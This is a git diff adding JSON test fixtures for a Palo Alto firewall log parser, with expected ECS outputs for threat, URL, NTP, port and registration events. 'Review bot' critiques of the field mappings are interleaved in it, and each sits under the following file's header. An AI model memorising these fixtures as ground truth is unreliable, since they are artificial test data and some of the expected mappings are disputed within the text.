+ "observer": {
+ "name": "DG-test",
+ "product": "PAN-OS",
+ "serial_number": "00795700000000",
+ "version": "0.0.-1"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "556",
+ "DGHierarchyLevel2": "0",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "Threat_ContentType": "globalprotect",
+ "VirtualSystemID": "1",
+ "connection": {
+ "stage": "logout"
+ },
+ "source": {
+ "private": {
+ "ip": "1.2.3.4"
+ },
+ "region": "1.0.0.0-1.255.255.255"
+ }
+ },
+ "related": {
+ "ip": [
+ "1.5.7.3"
+ ],
+ "user": [
+ "joe.doe@test.com"
+ ]
+ },
+ "source": {
+ "address": "1.5.7.3",
+ "ip": "1.5.7.3",
+ "user": {
+ "name": "joe.doe@test.com"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json
new file mode 100644
index 000000000..c3d742b70
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json
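Review bot: `observer.version` is pinned to `0.0.-1`, which comes from `GlobalProtectClientVersion` — the endpoint agent's version, not the PAN-OS observer's — so the field misattributes the value; it belongs under a client-side field (`user_agent.version` or `paloalto.*`) or should be left out. The expectation also diverges from the CSV GlobalProtect fixture in this commit (test_globalprotect.json): `EventStatus: success` is not reflected in `event.outcome`/`action.outcome`, and `EndpointOSType`/`EndpointOSVersion` are not mapped to `host.os`/`user_agent.os`, although the CSV form maps all of them. Unless the JSON dialect is meant to be poorer, the expected block should carry `"outcome": "success"` and `"os": {"version": "Microsoft Windows 11 Enterprise , 64-bit"}` so both input forms produce the same event.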
@@ -0,0 +1,93 @@
+{
+ "input": {
+ "message": "{\"TimeReceived\":\"2024-07-08T08:55:38.000000Z\",\"DeviceSN\":\"007954000370000\",\"LogType\":\"THREAT\",\"Subtype\":\"vulnerability\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T15:52:09.000000Z\",\"SourceAddress\":\"1.2.1.3\",\"DestinationAddress\":\"2.2.1.4\",\"NATSource\":\"\",\"NATDestination\":\"\",\"Rule\":\"Public_TTT_Mgmt\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"ssh\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"Trust\",\"ToZone\":\"TTT\",\"InboundInterface\":\"ethernet1/8\",\"OutboundInterface\":\"ethernet1/4.124\",\"LogSetting\":\"test_setting\",\"SessionID\":72837,\"RepeatCount\":1,\"SourcePort\":52000,\"DestinationPort\":21,\"NATSourcePort\":0,\"NATDestinationPort\":0,\"Protocol\":\"tcp\",\"Action\":\"reset-both\",\"FileName\":null,\"ThreatID\":\"SSH User Authentication Brute Force Attempt(40015)\",\"VendorSeverity\":\"High\",\"DirectionOfAttack\":\"client to server\",\"SequenceNo\":7350395687601,\"SourceLocation\":\"1.0.0.0-1.255.255.255\",\"DestinationLocation\":\"ID\",\"PacketID\":12103464791027,\"FileHash\":null,\"ApplianceOrCloud\":null,\"URLCounter\":0,\"FileType\":null,\"SenderEmail\":null,\"EmailSubject\":null,\"RecipientEmail\":null,\"ReportID\":0,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":1169,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ThreatCategory\":\"brute-force\",\"ContentVersion\":\"581116536\",\"SigFlags\":\"0x0\",\"RuleUUID\":\"496a138d-6515-4043-b7c7\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2024-07-08T15:52:09.934000Z\",\"NSSAINetworkSliceType\":null}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Palo Alto NGFW",
+ "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\"TimeReceived\":\"2024-07-08T08:55:38.000000Z\",\"DeviceSN\":\"007954000370000\",\"LogType\":\"THREAT\",\"Subtype\":\"vulnerability\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T15:52:09.000000Z\",\"SourceAddress\":\"1.2.1.3\",\"DestinationAddress\":\"2.2.1.4\",\"NATSource\":\"\",\"NATDestination\":\"\",\"Rule\":\"Public_TTT_Mgmt\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"ssh\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"Trust\",\"ToZone\":\"TTT\",\"InboundInterface\":\"ethernet1/8\",\"OutboundInterface\":\"ethernet1/4.124\",\"LogSetting\":\"test_setting\",\"SessionID\":72837,\"RepeatCount\":1,\"SourcePort\":52000,\"DestinationPort\":21,\"NATSourcePort\":0,\"NATDestinationPort\":0,\"Protocol\":\"tcp\",\"Action\":\"reset-both\",\"FileName\":null,\"ThreatID\":\"SSH User Authentication Brute Force Attempt(40015)\",\"VendorSeverity\":\"High\",\"DirectionOfAttack\":\"client to server\",\"SequenceNo\":7350395687601,\"SourceLocation\":\"1.0.0.0-1.255.255.255\",\"DestinationLocation\":\"ID\",\"PacketID\":12103464791027,\"FileHash\":null,\"ApplianceOrCloud\":null,\"URLCounter\":0,\"FileType\":null,\"SenderEmail\":null,\"EmailSubject\":null,\"RecipientEmail\":null,\"ReportID\":0,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":1169,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST\",\"SourceUUID\":null,\"DestinationUUID\":null,\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"ThreatCategory\":\"brute-force\",\"ContentVersion\":\"581116536\",\"SigFlags\":\"0x0\",\"RuleUUID\":\"496a138d-6515-4043-b7c7\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"DomainEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"PartialHash\":0,\"TimeGeneratedHighResolution\":\"2024-07-08T15:52:09.934000Z\",\"NSSAINetworkSliceType\":null}",
+ "event": {
+ "action": "reset-both",
+ "category": [
+ "vulnerability"
+ ],
+ "dataset": "threat",
+ "outcome": "success",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-07-08T15:52:09Z",
+ "action": {
+ "name": "reset-both",
+ "outcome": "success",
+ "type": "vulnerability"
+ },
+ "destination": {
+ "address": "2.2.1.4",
+ "geo": {
+ "country_iso_code": "ID"
+ },
+ "ip": "2.2.1.4",
+ "nat": {
+ "port": 0
+ },
+ "port": 21
+ },
+ "log": {
+ "hostname": "DN-TEST",
+ "level": "High",
+ "logger": "threat"
+ },
+ "network": {
+ "application": "ssh"
+ },
+ "observer": {
+ "egress": {
+ "interface": {
+ "alias": "TTT"
+ }
+ },
+ "ingress": {
+ "interface": {
+ "alias": "Trust"
+ }
+ },
+ "name": "DN-TEST",
+ "product": "PAN-OS",
+ "serial_number": "007954000370000"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "997",
+ "DGHierarchyLevel2": "1169",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "DirectionOfAttack": "client to server",
+ "Threat_ContentType": "vulnerability",
+ "VirtualLocation": "vsys1",
+ "threat": {
+ "category": "brute-force",
+ "id": "SSH User Authentication Brute Force Attempt(40015)"
+ }
+ },
+ "related": {
+ "ip": [
+ "1.2.1.3",
+ "2.2.1.4"
+ ]
+ },
+ "rule": {
+ "name": "Public_TTT_Mgmt",
+ "uuid": "496a138d-6515-4043-b7c7"
+ },
+ "source": {
+ "address": "1.2.1.3",
+ "ip": "1.2.1.3",
+ "port": 52000
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json
new file mode 100644
index 000000000..b4a75c57c
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json
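Review bot: `paloalto.threat.id` pins the combined string `SSH User Authentication Brute Force Attempt(40015)`, whereas the CSV fixture in this commit (test_ldap_brute_force.json) splits the same `name(id)` shape into `threat.id` `40005`, `threat.name`, `event.code` and `event.reason`; the JSON form therefore yields no `event.code`, so detection rules keyed on the threat number will silently miss these events. The expectation here should match the CSV one: `"id": "40015"`, `"name": "SSH User Authentication Brute Force Attempt"`, plus `event.code`/`event.reason`, with the parser's JSON branch applying the same split. `destination.nat` is also left as `{"port": 0}` after the empty `NATDestination` is dropped; a lone zero port carries no information, so the object could be omitted whenever the NAT address is absent.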
@@ -0,0 +1,111 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-07-08T06:17:04.000000Z\",\"DeviceSN\":\"00795400037XXXX\",\"LogType\":\"THREAT\",\"Subtype\":\"url\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T13:13:27.000000Z\",\"SourceAddress\":\"19.16.1.6\",\"DestinationAddress\":\"17.25.11.9\",\"NATSource\":\"210.210.140.61\",\"NATDestination\":\"17.25.11.9\",\"Rule\":\"Guest_Mobile_Internet Access\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"ssl\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"TTT\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/6.997\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Test_setting\",\"SessionID\":816808,\"RepeatCount\":1,\"SourcePort\":35000,\"DestinationPort\":443,\"NATSourcePort\":28500,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"alert\",\"URL\":\"test.gstatic.com/\",\"URLCategory\":\"computer-and-internet-info\",\"VendorSeverity\":\"Informational\",\"DirectionOfAttack\":\"client to 
server\",\"SequenceNo\":73503956876009,\"SourceLocation\":\"19.18.0.0-19.18.255.255\",\"DestinationLocation\":\"US\",\"ContentType\":null,\"PacketID\":0,\"URLCounter\":0,\"UserAgent\":null,\"X-Forwarded-For\":null,\"Referer\":null,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":1169,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST\",\"SourceUUID\":null,\"DestinationUUID\":null,\"HTTPMethod\":\"unknown\",\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"InlineMLVerdict\":\"unknown\",\"ContentVersion\":\"0\",\"SigFlags\":0,\"HTTPHeaders\":null,\"URLCategoryList\":\"computer-and-internet-info,low-risk\",\"RuleUUID\":\"6935060f-6443-4257\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-07-08T13:13:27.233000Z\",\"NSSAINetworkSliceType\":null}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": 
"{\"TimeReceived\":\"2024-07-08T06:17:04.000000Z\",\"DeviceSN\":\"00795400037XXXX\",\"LogType\":\"THREAT\",\"Subtype\":\"url\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-07-08T13:13:27.000000Z\",\"SourceAddress\":\"19.16.1.6\",\"DestinationAddress\":\"17.25.11.9\",\"NATSource\":\"210.210.140.61\",\"NATDestination\":\"17.25.11.9\",\"Rule\":\"Guest_Mobile_Internet Access\",\"SourceUser\":null,\"DestinationUser\":null,\"Application\":\"ssl\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"TTT\",\"ToZone\":\"Untrust\",\"InboundInterface\":\"ethernet1/6.997\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Test_setting\",\"SessionID\":816808,\"RepeatCount\":1,\"SourcePort\":35000,\"DestinationPort\":443,\"NATSourcePort\":28500,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"alert\",\"URL\":\"test.gstatic.com/\",\"URLCategory\":\"computer-and-internet-info\",\"VendorSeverity\":\"Informational\",\"DirectionOfAttack\":\"client to server\",\"SequenceNo\":73503956876009,\"SourceLocation\":\"19.18.0.0-19.18.255.255\",\"DestinationLocation\":\"US\",\"ContentType\":null,\"PacketID\":0,\"URLCounter\":0,\"UserAgent\":null,\"X-Forwarded-For\":null,\"Referer\":null,\"DGHierarchyLevel1\":997,\"DGHierarchyLevel2\":1169,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"DN-TEST\",\"SourceUUID\":null,\"DestinationUUID\":null,\"HTTPMethod\":\"unknown\",\"IMSI\":0,\"IMEI\":null,\"ParentSessionID\":0,\"ParentStarttime\":\"1970-01-01T00:00:00.000000Z\",\"Tunnel\":\"N/A\",\"InlineMLVerdict\":\"unknown\",\"ContentVersion\":\"0\",\"SigFlags\":0,\"HTTPHeaders\":null,\"URLCategoryList\":\"computer-and-internet-info,low-risk\",\"RuleUUID\":\"6935060f-6443-4257\",\"HTTP2Connection\":0,\"DynamicUserGroupName\":null,\"X-Forwarded-ForIP\":null,\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\
":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"HostID\":null,\"EndpointSerialNumber\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-07-08T13:13:27.233000Z\",\"NSSAINetworkSliceType\":null}", + "event": { + "action": "alert", + "category": [ + "network" + ], + "dataset": "threat", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-08T13:13:27Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "17.25.11.9", + "domain": "test.gstatic.com", + "geo": { + "country_iso_code": "US" + }, + "ip": "17.25.11.9", + "nat": { + "ip": "17.25.11.9", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "DN-TEST", + "level": "Informational", + "logger": "threat" + }, + "network": { + "application": "ssl" + }, + "observer": { + "egress": { + "interface": { + "alias": "Untrust" + } + }, + "ingress": { + "interface": { + "alias": "TTT" + } + }, + "name": "DN-TEST", + "product": "PAN-OS", + "serial_number": "00795400037XXXX" + }, + "paloalto": { + "DGHierarchyLevel1": "997", + "DGHierarchyLevel2": "1169", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "DirectionOfAttack": "client to server", + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "test.gstatic.com" + ], + "ip": [ + "17.25.11.9", + "19.16.1.6", + "210.210.140.61" + ] + }, + "rule": { + "name": "Guest_Mobile_Internet Access", + "uuid": "6935060f-6443-4257" + }, + "source": { + "address": 
"19.16.1.6", + "ip": "19.16.1.6", + "nat": { + "ip": "210.210.140.61", + "port": 28500 + }, + "port": 35000 + }, + "threat": { + "indicator": { + "name": "test.gstatic.com/" + } + }, + "url": { + "domain": "test.gstatic.com", + "registered_domain": "gstatic.com", + "subdomain": "test", + "top_level_domain": "com" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json new file mode 100644 index 000000000..a470b3176 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json 
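Review bot: The raw `URL` value `test.gstatic.com/` is expected under `threat.indicator.name` although this is a URL-filtering `alert` on the `computer-and-internet-info,low-risk` categories, so a benign browsing destination is asserted as a threat indicator. The neutral ECS home for the visited location is `url.original`; the fixture already derives `url.domain`, `url.registered_domain`, `url.subdomain` and `url.top_level_domain` from it but never asserts the original string. If the parser is meant to treat every URL-subtype event as an indicator, a short comment in the parser should say so; otherwise the expectation should become `"url": { "original": "test.gstatic.com/", ... }` and `threat.indicator.name` should be dropped. This is a fixture, so the change belongs in the parser it exercises as well.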
@@ -0,0 +1,42 @@
+{
+ "input": {
+ "message": "{\"LogTime\":\"2023-02-16T15:46:40.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"ntpd\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:46:33.000000Z\",\"VirtualLocation\":null,\"EventName\":\"sync\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"NTP sync to server de.pool.ntp.org\",\"SequenceNo\":7200776623254143145,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:46:33.917000Z\"}\n"
+ },
+ "expected": {
+ "message": "{\"LogTime\":\"2023-02-16T15:46:40.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"ntpd\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:46:33.000000Z\",\"VirtualLocation\":null,\"EventName\":\"sync\",\"EventComponent\":\"\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"NTP sync to server de.pool.ntp.org\",\"SequenceNo\":7200776623254143145,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:46:33.917000Z\"}\n",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "dataset": "system",
+ "reason": "NTP sync to server de.pool.ntp.org",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2023-02-16T15:46:33Z",
+ "action": {
+ "type": "ntpd"
+ },
+ "destination": {
+ "address": "de.pool.ntp.org"
+ },
+ "host": {
+ "name": "PA-VM"
+ },
+ "log": {
+ "level": "Informational",
+ "logger": "system"
+ },
+ "observer": {
+ "product": "PAN-OS"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "0",
+ "DGHierarchyLevel2": "0",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "Threat_ContentType": "ntpd"
+ }
+ }
+}
\
No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json
new file mode 100644
index 000000000..af31efa35
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json
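Review bot: `destination.address` is expected to hold the hostname `de.pool.ntp.org`, but no `destination.domain` and no `related.hosts` entry is asserted, whereas the registration fixture in this same patch (`test_registration_succeed_json.json`) expects `destination.domain`, `registered_domain`, `subdomain`, `top_level_domain` and `related.hosts` for `wildfire.paloaltonetworks.com`. Hostnames extracted from `EventDescription` should land in the same fields regardless of subtype, otherwise a `related.hosts` pivot misses the NTP server. Unless the difference is deliberate, add `"domain": "de.pool.ntp.org"` under `destination` and `"related": { "hosts": [ "de.pool.ntp.org" ] }` to the expectation, and align the parser so the fixture passes.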
@@ -0,0 +1,46 @@ +{ + "input": { + "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"port\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:50.000000Z\",\"VirtualLocation\":null,\"EventName\":\"link-change\",\"EventComponent\":\"ethernet1/2\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Port ethernet1/2: Up 10Gb/s-full duplex\",\"SequenceNo\":7200776623254143073,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:50.851000Z\"}\n" + }, + "expected": { + "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"port\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:50.000000Z\",\"VirtualLocation\":null,\"EventName\":\"link-change\",\"EventComponent\":\"ethernet1/2\",\"VendorSeverity\":\"Informational\",\"EventDescription\":\"Port ethernet1/2: Up 10Gb/s-full duplex\",\"SequenceNo\":7200776623254143073,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:50.851000Z\"}\n", + "event": { + "action": "Up", + "category": [ + "network" + ], + "dataset": "system", + "reason": "Port ethernet1/2: Up 10Gb/s-full duplex", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-16T15:31:50Z", + "action": { + "name": "Up", + "type": "port" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "ingress": { + "interface": { + "name": "ethernet1/2" + } + }, + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + 
"DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "port" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json new file mode 100644 index 000000000..c9ebd467e --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json 
@@ -0,0 +1,51 @@ +{ + "input": { + "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"fb\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:51.000000Z\",\"VirtualLocation\":null,\"EventName\":\"wildfire-conn-success\",\"EventComponent\":\"\",\"VendorSeverity\":\"Medium\",\"EventDescription\":\"Successfully registered to Public Cloud wildfire.paloaltonetworks.com\",\"SequenceNo\":7200776623254143102,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:51.387000Z\"}\n" + }, + "expected": { + "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"fb\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:51.000000Z\",\"VirtualLocation\":null,\"EventName\":\"wildfire-conn-success\",\"EventComponent\":\"\",\"VendorSeverity\":\"Medium\",\"EventDescription\":\"Successfully registered to Public Cloud wildfire.paloaltonetworks.com\",\"SequenceNo\":7200776623254143102,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:51.387000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "system", + "reason": "Successfully registered to Public Cloud wildfire.paloaltonetworks.com", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-16T15:31:51Z", + "action": { + "type": "fb" + }, + "destination": { + "address": "wildfire.paloaltonetworks.com", + "domain": "wildfire.paloaltonetworks.com", + "registered_domain": "paloaltonetworks.com", + "subdomain": "wildfire", + "top_level_domain": "com" + }, + "host": { + "name": "PA-VM" + }, 
+ "log": {
+ "level": "Medium",
+ "logger": "system"
+ },
+ "observer": {
+ "product": "PAN-OS"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "0",
+ "DGHierarchyLevel2": "0",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "Threat_ContentType": "fb"
+ },
+ "related": {
+ "hosts": [
+ "wildfire.paloaltonetworks.com"
+ ]
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system.json
new file mode 100644
index 000000000..2d21571e0
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system.json
@@ -0,0 +1,41 @@
+{
+ "input": {
+ "message": "1,2024/01/12 22:47:26,016201000000,SYSTEM,vpn,2222,2024/01/12 22:47:27,,test-event,,0,0,general,informational,\"unknown test peer\",55555555555555555,0x0,0,0,0,0,,test-1,0,0,2024-01-12T22:47:27.652+11:00"
+ },
+ "expected": {
+ "message": "1,2024/01/12 22:47:26,016201000000,SYSTEM,vpn,2222,2024/01/12 22:47:27,,test-event,,0,0,general,informational,\"unknown test peer\",55555555555555555,0x0,0,0,0,0,,test-1,0,0,2024-01-12T22:47:27.652+11:00",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "dataset": "system",
+ "reason": "unknown test peer",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-01-12T11:47:27.652000Z",
+ "action": {
+ "name": "test-event",
+ "type": "vpn"
+ },
+ "log": {
+ "hostname": "test-1",
+ "level": "informational",
+ "logger": "system"
+ },
+ "observer": {
+ "name": "test-1",
+ "product": "PAN-OS",
+ "serial_number": "016201000000"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "0",
+ "DGHierarchyLevel2": "0",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "EventID": "test-event",
+ "Threat_ContentType": "vpn"
+ }
+ }
+}
\ No newline at end of file
